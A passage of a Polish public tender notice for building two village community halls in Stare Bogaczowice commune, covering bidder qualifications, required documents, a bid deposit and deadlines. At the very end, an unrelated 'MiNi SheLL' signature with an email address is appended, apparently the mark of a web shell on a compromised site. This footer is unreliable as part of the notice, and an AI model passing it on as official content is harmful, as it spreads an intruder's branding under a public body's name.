sposób należyty, zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone.<br/>4.2) kadra techniczna: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czas realizacji zamówienia będzie<br/>dysponował osobami o odpowiednich kwalifikacjach zawo-dowych niezbędnych do wykonania zamówienia, tj.:<br/>a) jedną osobą, posiadającą uprawnienia budowlane, w nieograniczonym zakresie, w specjalności<br/>konstrukcyjnobudowlanej,<br/>która będzie pełniła funkcje kierownika budowy, oraz która posiada min. dwuletnie doświadczenie w tym<br/>zakresie; ze stażem pracy zawodowej nie krótszym niż 5 lat. Osoba ta musi należeć do właściwej Izby Inżynierów<br/>Budownictwa.<br/>b) jedną osobą, posiadającą min. dwuletnie doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika<br/>robót, w zakresie kierowania robotami branży wodno-kanalizacyjnej oraz posiadającej uprawnienia do wykonywania<br/>samodzielnych funkcji w budownictwie, w nieograniczonym zakresie, w specjalności instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, która będzie pełniła funkcję kierownika<br/>robót sanitarnych; Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.<br/>c) jedną osobą, posiadającą min. dwuletnie doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika<br/>robót, w zakresie kierowania robotami branży elektrycznej oraz posiadającej uprawnienia do wykonywania samodzielnych<br/>funkcji w budownictwie, w nieograniczonym zakresie, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych, która będzie pełniła funkcję kierownika robót elektrycznych. Osoba ta musi należeć do właściwej Izby<br/>Inżynierów Budownictwa.<br/>Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z za-łącznikiem nr 2A do SWZ, które<br/>stanowi wstępne potwierdzenie, że wykonawca speł-nia warunki udziału w postępowaniu, następnie na podstawie<br/>dokumentu, złożonego na wezwanie Zamawiającego przez Wykonawcę, którego oferta została najwyżej oceniona - zgodnie<br/>z załącznikiem nr 4 do SWZ. Zamawiający określając wymogi dla osób w za-kresie posiadanych uprawnień dopuszcza<br/>odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz<br/>odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej,<br/>państwach członkowskich Europejskiego porozumienia o wolnym Handlu (EFTA) - stronach umowy o Europejskim<br/>Obszarze Gospodarczym, Konfedera-cji Szwajcarskiej, zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej, wówczas wykonawca na wła-sny koszt zapewni tłumacza języka polskiego, który zapewni<br/>stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco<br/>wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak<br/>i dostarczonych przez Zamawiającego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że<br/>łącz-nie spełniają w/w warunek. Zamawiający informuje, że wymaga, aby osoby wskazane w załączniku nr 4 do SWZ brały<br/>bezpośredni udział w wykonywaniu zamówienia.<br/>4.3) potencjał techniczny: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależno-ści do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofer-tę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświad-czenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informa-cjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszcze-nie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>c) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>d) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo<br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne<br/>wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpo-wiednie dokumenty - załącznik nr 3 do SWZ;<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości, wraz z informacja-mi na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia nie-zbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - załącznik nr 4 do SWZ;<br/>c) przedstawi kserokopię polisy, opłaconą lub w przypadku jej braku inny dokument potwier-dzający, że wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowa-dzonej działalności związanej z przedmiotem zamówienia na<br/>minimalną sumą gwarancyjną na jedno i wszystkie zdarzenia w wysokości co najmniej 2.000.000,00 zł (dwa miliony zł).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na formularzu ofertowym - zgodnie z załącznikiem nr 1 oraz nr 1a do SWZ do których należy dołączyć<br/>kosztorysy ofertowe odrębnie dla każdej ze świetlic. Wraz z ofertą wykonawca zobowiązany jest złożyć:<br/>1) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym<br/>przez zamawiającego zgodnie z wzorem stanowiącym załącznik nr 2A do SWZ,<br/>2) pełnomocnictwo:<br/>a) jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z dokumentów, o których mowa w ppkt 6, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien<br/>dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie w szczególności do złożenia oferty<br/>lub do złożenia oferty i podpisania umowy,<br/>b) zapis ppkt 2 lit. a stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp,<br/>c) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych<br/>z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania<br/>3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych<br/>z wykonawców, którzy wykonają robotę, do realizacji których te zdolności są wymagane.<br/>W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty wykonają<br/>poszczególni wykonawcy.<br/>4) jeżeli wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>(załącznik nr 7 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określający w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>5) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu przez podmiot<br/>udostępniający zasoby, jeżeli Wykonawca polega na zasobach podmiotu trzeciego w celu wykazania spełniania warunków<br/>udziału w postępowaniu - załącznik nr 2B do SWZ,<br/>6) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania:<br/>a) wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ppkt 6, jeżeli zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów.<br/>7) Dokument gwarancji lub poręczenia (w przypadku wadium złożonego w formie poręczeń lub gwarancji) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 40 000,00<br/>PLN (słownie: czterdzieści tysięcy złotych 00/100).<br/>2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 97 ust. 7 ustawy, tj.:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego:<br/>32 2030 0045 1110 0000 0087 7670 w Banku BGŻ O/WAŁBRZYCH: „Budowa dwóch świetlic wiejskich w<br/>miejscowościach Gostków i Nowe Bogaczowice, gmina Stare Bogaczowice”<br/>5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na<br/>rachunku Zamawiającego.<br/>6. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego - art. 97<br/>ust 8 ustawy prawo zamówień publicznych.<br/>7. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego<br/>w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach<br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/>8. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego<br/>wykonania umowy określa ustawa Pzp.<br/>9. W przypadku wadium wniesionym w gwarancji bankowych, gwarancji ubezpieczeniowych, poręczeniach udzielanych<br/>przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299). Oryginał takiego wadium należy dołączyć do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 1,<br/>składa każdy z wykonawców we własnym imieniu. Oświadczenia te po-twierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>12. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika które<br/>usługi wykonają poszczególni wykonawcy.<br/>13. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania, o któ-rych mowa w pkt 4<br/>ppkt 1 lit. a, b, c, d składa każdy z wykonawców wspólnie ubiegających się o zamówienie we własnym imieniu.<br/>14. W przypadku Wykonawców działających w formie spółki cywilnej:<br/>1) oświadczenie, o którym mowa w pkt 1 składane jest przez każdego wspólnika spółki cywilnej oddzielnie we własnym<br/>imieniu (osoby prowadzącej działalność gospodarczą pod nazwą okre-śloną w centralnej ewidencji i informacji o działalności<br/>gospodarczej - „Firma przedsiębiorcy”),<br/>2) podmiotowe środki dowodowe, o których mowa w pkt 4 ppkt 1 lit. a-d składane są przez każde-go wspólnika spółki<br/>cywilnej oddzielnie we własnym imieniu (osoby prowadzącej działalność gospodarczą pod nazwą określoną w centralnej<br/>ewidencji i informacji o działalności gospodar-czej - „Firma przedsiębiorcy”),<br/>c) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienio-nych<br/>z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania<br/>3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych<br/>z wykonawców, którzy wykonają robotę, do realizacji których te zdolności są wymagane.<br/>W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowa-dzone do treści tej<br/>umowy, określone zostały w załączniku nr 6 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści zawartej oferty w zakresie<br/>uregulowanym w art. 455 Pzp oraz wskazanym we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta wraz z załącznikami musi być złożona za pośrednictwem miniPortalu: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com